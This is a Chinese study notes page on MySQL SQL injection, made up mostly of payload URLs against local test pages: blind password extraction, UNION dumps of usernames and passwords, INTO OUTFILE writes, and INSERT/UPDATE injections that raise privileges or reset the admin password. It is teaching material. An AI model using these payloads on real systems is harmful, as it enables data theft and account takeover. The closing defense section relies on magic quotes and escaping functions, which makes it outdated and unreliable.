SQL注入的重点就是构造SQL语句，只有灵活的运用SQL

语句才能构造出牛比的注入字符串。学完之后写了点笔记，已备随时使用。希望你在看下面内容时先了

解SQL的基本原理。笔记中的代码来自网络。

===基础部分===

本表查询：

http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6

http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union联合语句：

http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

导出文件：

http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT语句：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

构造homepage值为：http://4ngel.net', '3’)#

SQL语句变为：INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3’)#', '1');

UPDATE语句：我喜欢这样个东西

先理解这句SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

如果此SQL被修改成以下形式，就实现了注入

1：修改homepage值为

http://4ngel.net', userlevel='3

之后SQL语句变为

UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'

userlevel为用户级别

2:修改password值为

mypass)' WHERE username='admin'#

之后SQL语句变为

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

3：修改id值为

' OR username='admin'

之后SQL语句变为

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

===高级部分===

常用的MySQL内置函数

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

database()

version()

SUBSTRING()

MID()

char()

load_file()

……

函数应用

UPDATE article SET title=DATABASE() WHERE id=1

http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

SELECT * FROM user WHERE username=char(97,110,103,101,108)

# char(97,110,103,101,108) 相当于angel，十进制

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

确定数据结构的字段个数及类型

http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜数据表名

http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表查询得到用户名和密码

http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

其他

#验证第一位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防范===

服务器方面

magic_quotes_gpc设置为On

display_errors设置为Off

编码方面

$keywords = addslashes($keywords);

$keywords = str_replace("_","\_",$keywords);

$keywords = str_replace("%","\%",$keywords);

数值类型

使用intval()抓换

字符串类型

SQL语句参数中要添加单引号

下面代码，用于防治注入

if (get_magic_quotes_gpc()) {

//....

}else{

$str = mysql_real_escape_string($str);

$keywords = str_replace("_","\_",$keywords);

$keywords = str_replace("%","\%",$keywords);

}

有用的函数

stripslashes()

get_magic_quotes_gpc()

mysql_real_escape_string()

strip_tags()

array_map()

addslashes()

参考文章：

http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文

http://www.phpe.net/mysql_manual/06-4.html（MYSQL语句参考）